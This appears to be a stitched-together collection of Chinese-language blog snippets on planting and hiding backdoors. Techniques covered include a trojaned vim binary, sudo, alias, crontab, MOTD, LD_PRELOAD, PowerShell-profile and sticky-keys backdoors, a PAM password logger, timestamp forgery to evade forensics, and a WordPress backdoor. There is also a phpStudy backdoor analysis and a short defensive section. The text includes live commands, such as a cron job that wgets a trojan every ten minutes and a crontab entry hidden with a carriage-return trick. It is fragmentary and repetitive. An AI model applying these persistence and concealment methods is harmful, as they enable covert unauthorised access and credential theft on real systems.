:help autocmd-events 0x03 vim 后门说明 vim 软件成熟度比较高,功能较为复杂,因此可以用来做后门的内容肯定很多,作为一个 vim 用户,我对于 vim 的了解也比较有限...,相信在以后还会对现在写的后门手法进行补充 0x04 vim 自身文件后门 这类后门比较简单粗暴,直接替换相关文件,暂时未发现 vim 存在自身使用的 .so 共享库文件,因此本章节以直接替换命令本身为例...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本...) sudo apt update sudo apt install dpkgdev apt source vim 2) 加入后门代码 本次演示加入的恶意代码功能为新建 /tmp/flag.txt...成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法
sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...22.10 为例 0x01 sudo 配置后门 1) 简介 通常的应用场景中,配置 sudo 主要是用来赋予某个用户或者用户组能够以 root(或其他用户) 的身份(以及权限)执行部分(或全部) 程序...空白文件名 文件 + alias 劫持的方法来隐藏新建文件 有时候也没必要新建用户,可以尝试开启那些系统用户试试,或许有惊喜也说不定,但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门...这个后门更偏向于一个概念性的后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 的时候关注到 sudoedit (sudo -e) 这个程序,这个程序用来让可以sudo的用户通过 sudoedit
$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....
%h%m%s'`.log -e read,write,connect -s2048 ssh' 上面是我搜索了10多篇文章,发现的同一条后门命令,既然有前辈写了,咱们就分析分析 上面后门中,其实 alias...可以看到我们之前提交的数据,同时呢,这个文件返回的内容也比较多,只要改一个好点的名字可能会让安全管理人员认为是正常的文件 这种后门的场景就是用户登录到这台主机上后,使用这台主机的ssh去远程连接其他主机才能引发后门...,记录明文密码,这局限性太大了,顶多可以作为一个后门辅助。...经过我的一番寻找,加上自己所剩无几的经验,终于找到了一个目录 /etc/update-manager/ ,这个目录我跟你说,我一眼就相中了,这简直就是为后门设计的呀 ?...后门 ?
Ubuntu server 16.04 默认 /etc/ssh/ssh_config
3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab
cd /tmp mkdir cgi-bin echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi echo 'echo -e ...
加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...设置后门后是这样的 ? alias 劫持显示 这个简单了,把这些字符替换成空就行了 ?...咱们把劫持 unalias 和劫持 alias 放在最后,先把这些命令都劫持一下: env 没有后门时候是这样的 ? 设置了后门之后是这样的 ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!
0x00 前情提要 在 alias 后门 | Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...让后门更加完美 atime -> access time, 访问时间 mtime -> modify time,修改时间 ctime -> change time, 状态变化时间 最新版 Linux 中多了一个属性...所以还是需要通过修改系统时间来进行 0x07 Ubuntu Server 22.10 实验 Ubuntu Server 即使断网使用 date -s 来修改系统时间,系统时间也会马上恢复 还是以 alias 后门那篇文章里的后门为例...给后门程序添加可执行权限(配置文件先将权限设置成和release-upgrades相同) chmod +x /tmp/release-update 用系统时间覆盖硬件时间 sudo hwclock.../etc/update-manager/ 如果是需要执行的后门,现在执行并放置后台,如果像 alias 那种配置文件后门则不需要此章节 /etc/update-manager/release-update
最近看了苑房弘老师的打靶课程,发现了 MOTD 这个东西,于是研究了一下,发现很适合做后门,早在08年以前就有恶意软件使用了这种方式,今天系统地研究一下 motd,全称Message Of The Day...,是Linux中发送问候消息的功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的,所以很适合用来做后门 实用部分 随着关注我们的朋友越来越多...18.04中 motd 的动态脚本都在 /etc/update-motd.d/这个目录下 这些脚本动态的组合成了我们上面看到的那么 Banner 信息 这些文件只允许 root 用户编辑,所以使用此后门需要先获取...root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #!...,但是考虑很多兄弟没看过之前的文章,所以这次重提一下 这个点说透以后,能用来做后门的可就不止 motd 这一个组件了,你可以想象一下,得有多少地方会使用 source或 .
什么是后门 后门程序是一种恶意软件类型,它会阻止正常的身份验证过程访问系统。因此,远程访问被授予应用程序内的资源,例如数据库和文件服务器,从而使犯罪者能够远程发布系统命令并更新恶意软件。...Webserver后门用于许多恶意活动,其中包括: 数据盗窃 网站瑕疵 服务器劫持 启动分布式拒绝服务(DDoS)攻击 感染网站访问者(水坑攻击) 高级持续威胁(APT)攻击 后门木马安装 最流行的后门安装方法涉及远程文件包含...它启动第二阶段 - 在服务器上下载并安装后门脚本。 后门壳去除的挑战 一旦安装,后门是非常难以清除的。传统上,检测涉及使用软件扫描程序在服务器文件系统中搜索已知的恶意软件签名。...即使检测到后门,典型的缓解方法(甚至系统重新安装)也不可能将其从应用程序中移除。对于在可重写存储器中持续存在的后门来说尤其如此。...用INCAPSULA减轻后门外壳攻击 在Imperva Incapsula,我们使用多种方法来防止后门安装,以及检测和隔离现有的后门外壳。
Administrator\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 这些配置文件中都可以类似 Bash 配置文件一样,在其中放置后门程序...在第一个后门文件中额外插入powershell 代码,将 I am a Backdoor 写入到桌面的 backdoor.txt 中 先是在 cmd 中进行测试 powershell ..../demo.ps1 删除 backdoor.txt 图形化右键执行 demo.ps1 也就是说这类后门对所有的 powershell 程序有效
一、shift粘贴键后门介绍 Shift粘滞键是当用户连按5次shift就会自动弹出的一个程序,其实不光是粘滞键,还有各种辅助功能,这类辅助功能都拥有一个特点就是当用户未进行登录时也可以触发。...(辅助功能镜像劫持是一样的原理) 二、shift粘贴键后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限 靶机: windows...Server2012 IP: 192.168.226.128 2.1 创建shift粘贴键后门 粘滞键的启动程序在C盘的Windows/system32目录下为sethc.exe。...cmd路径:C:\Windows\system32\cmd.exe 2.2 验证shift粘贴键后门 shift粘贴键后门创建完成之后,在锁屏状态下连按次shift粘贴键,C:\Windows...NT \ CurrentVersion \ Image File ExecutionOption 双击sethc.exe文件就会进入注册表,查看注册表键值,确实被植入了shift粘贴键后门
在拿到样本后,我就对PhpStudy中的后门进行了一波逆向分析。...后门分析 最近关于讲phpstudy的文章很多,不过我只得到一个信息,后门在php_xmlrpc.dll文件中,有关键词:"eval(%s(%s))"。得知这个信息后,就降低了前期的工作难度。...研究了后门类型后,再来看看什么情况下会进入该函数触发该后门。...从这里可以知道,只要php成功加载了存在后门的xmlrpc.dll,那么任何只要构造对应的后门请求头,那么就能触发后门。在Nginx服务器的情况下就算请求一个不存在的路径,也会触发该后门。...修复方案也很简单,把php的php_xmlrpc.dll替换成无后门的版本,或者现在直接去官网下载,官网现在的版本经检测都不存后门。
这个后门真的又可怕又好用... 网上流传的都是Centos的版本,因为场景不同,我研究了一下针对Ubuntu,大同小异。...记录登录到本机的用户名和密码 */ #define OLOG "/tmp/.olog" /* 记录本机登录到远程的用户名和密码 */ #define SECRETPW "test" /* 后门的密码...记录登录到本机的用户名和密码 */#define OLOG "/tmp/.olog" /* 记录本机登录到远程的用户名和密码 */#define SECRETPW "test" /* 后门的密码...ilog user:password --> root:toor 再用我们的后门密码...test,可以发现,只记录正常的密码,我们的后门密码并不记录。
在拿到样本后,我就对PhpStudy中的后门进行了一波逆向分析。 2....后门分析 最近关于讲phpstudy的文章很多,不过我只得到一个信息,后门在php_xmlrpc.dll文件中,有关键词:"eval(%s(%s))"。得知这个信息后,就降低了前期的工作难度。...研究了后门类型后,再来看看什么情况下会进入该函数触发该后门。...从这里可以知道,只要php成功加载了存在后门的xmlrpc.dll,那么任何只要构造对应的后门请求头,那么就能触发后门。在Nginx服务器的情况下就算请求一个不存在的路径,也会触发该后门。...修复方案也很简单,把php的php_xmlrpc.dll替换成无后门的版本,或者现在直接去官网下载,官网现在的版本经检测都不存后门。
现实生活中有前门后门之分,前门一般守卫严格,难以突破,然而后门计较隐蔽,部位广大人们所知道,所以守卫比较松懈基本无人问津,所以后门的安全性很弱不能跟前门相比。...后门从其连接特性上可以分为两类,一是主动型、二是被动型。主动型后门像回连木马,它会在特定的时间向控制端发送连接请求,一旦连接成功,就形成一个后门通道然后就可以为所欲为。...后门的存在大部分的情况是在公司内部已经被入侵的情况下,如何清理后门是作为安全人员的一大难题,想要清理后门必须要对后门的种类、可能存在位置以及不同后门的特性了如指掌,需要知道攻击者留后门的各种手法,你只有懂的比攻击者多那么你才能发现它留下后门的踪迹...提了这么多的后门技术,我们如何查找这些后门呢? 1、对于账号类后门,我们可以监控账号变更、使用情况,这个还是比较容易发现问题并且得到解决。...,然后再根据不同类型后门的特性去查找后门。
图片绑定后门,由于过程稍复杂,大家如果有不懂的地方请在下面留言,看到了会回复大家的。 首先我们需要几个工具。 ? 2.远程工具 ?...接下来我们设置生成后门。 2.打开远控软件。 我们现在要生成一个后门的.exe文件。 由于远控软件都不统一,我们根据自己的软件生成就可以了。 ? 这是我生成的远控后门。 3....这个就是我们生成的带有后门的图片。我们双击试试效果。 ? Okay,已经上线了。
JexBoss 后门 https://us-cert.cisa.gov/ncas/analysis-reports/AR18-312A - "{{BaseURL}}/jexws/jexws.jsp?
权限后门是最容易被管理员忽视的环节,通常需要对系统进行全面检查才能发现。本文以Wordpress为例,介绍两种新型的后门方式。...为了登录这个admin 账号,我们需要进行如下操作 // 当带有 "update" 字样时就执行后门 if (!...写在最后 本文只是以Wordpress插件为例,讲解如何实现后门机制,后门代码并不一定放在插件里。至于如何隐藏后门,本文不再赘述。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
